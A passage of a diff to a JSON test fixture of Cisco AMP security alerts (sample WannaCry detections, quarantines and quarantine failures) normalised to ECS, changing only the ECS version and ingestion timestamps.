Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1925,7 +1925,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1945,7 +1945,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854032652Z", + "ingested": "2021-09-13T18:07:55.452582349Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -2000,7 +2000,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2026,7 +2026,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854034528Z", + "ingested": "2021-09-13T18:07:55.452584295Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2079,7 +2079,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2099,7 +2099,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854036408Z", + "ingested": "2021-09-13T18:07:55.452586210Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2156,7 +2156,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2186,7 +2186,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854038307Z", + "ingested": "2021-09-13T18:07:55.452588141Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2239,7 +2239,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2259,7 +2259,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854040200Z", + "ingested": "2021-09-13T18:07:55.452590049Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2314,7 +2314,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2334,7 +2334,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854042089Z", + "ingested": "2021-09-13T18:07:55.452592053Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2389,7 +2389,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2409,7 +2409,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854043976Z", + "ingested": "2021-09-13T18:07:55.452593968Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2466,7 +2466,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2496,7 +2496,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854045878Z", + "ingested": "2021-09-13T18:07:55.452595861Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2549,7 +2549,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2569,7 +2569,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854047755Z", + "ingested": "2021-09-13T18:07:55.452597787Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2620,7 +2620,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2640,7 +2640,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854049645Z", + "ingested": "2021-09-13T18:07:55.452599647Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2693,7 +2693,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2723,7 +2723,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854051576Z", + "ingested": "2021-09-13T18:07:55.452601659Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2780,7 +2780,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2812,7 +2812,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854053426Z", + "ingested": "2021-09-13T18:07:55.452603555Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2865,7 +2865,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2885,7 +2885,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854055298Z", + "ingested": "2021-09-13T18:07:55.452605458Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2940,7 +2940,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2972,7 +2972,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854057182Z", + "ingested": "2021-09-13T18:07:55.452607341Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3029,7 +3029,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3061,7 +3061,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854059068Z", + "ingested": "2021-09-13T18:07:55.452609262Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3118,7 +3118,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3150,7 +3150,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854060930Z", + "ingested": "2021-09-13T18:07:55.452611169Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat 